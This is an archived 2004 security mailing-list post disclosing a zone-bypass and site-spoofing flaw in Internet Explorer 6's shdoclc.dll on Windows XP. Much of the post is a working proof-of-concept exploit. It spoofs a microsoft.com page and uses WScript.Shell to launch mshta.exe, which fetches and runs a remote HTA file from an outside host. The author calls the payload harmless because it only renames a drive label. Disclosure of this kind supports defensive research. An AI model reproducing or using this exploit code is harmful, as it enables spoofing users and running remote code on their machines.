|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Windows XP Prof and shdoclc.dll - zone-pass and site spoofing
From: Bartosz Kwitkowski (bartosz
wb.pl)
Date: Tue Jul 13 2004 - 02:29:58 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
details:
OS: Windows XP Prof (fully patched), IE 6.0
LANG: Polish (of course).
VULN:
1.this is zone-by-pass. Opening IE window is in My Computer zone.
You can paste script into this page and it will be executed as local.
I think this is very serious vuln.
2.site spoofing. You can create spoofed link. User when clicking will think
he is going to for example microsoft.com. It will open page with
microsoft.com URL in address bar. You can paste your own page to this window
and user won't know this page is spoofed.This is also very serious problem.
EXPLOIT:
<html><body>
<script>
klocek = window.open('res://c:\\windows\\system32
\\shdoclc.dll/http_404.htm#http://www.microsoft.com','_meia');
klocek.document.write("<html><head><title>Microsoft.com</title>");
klocek.document.write("</head><body>Site moved to <a
href=\"http://wb.pl/bartosz\"> Bartosz Kwitkowski Home Page "+"<"+"/a>:-) Vuln
by Bartosz Kwitkowski\n");
klocek.document.write("<"+"script>\n");
klocek.document.write("alert(\"ATTACKING!\");\n");
klocek.document.write("var wsh=new ActiveXObject('WScript.Shell');\n");
klocek.document.write("wsh.Run('mshta.exe
http://wb.pl/bartosz/hta/start2.hta');\n");
klocek.document.write("<"+"/script>\n");
klocek.document.write("</body></html>\n");
</script>
</body></html>
----end--------
This is safe exploit so you can execute it if you want...
start2.hta contains script which changes your C: disk label to "new label".
PS: Sorry my English, but... :-)
Best regards,
Bartosz Kwitkowski
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]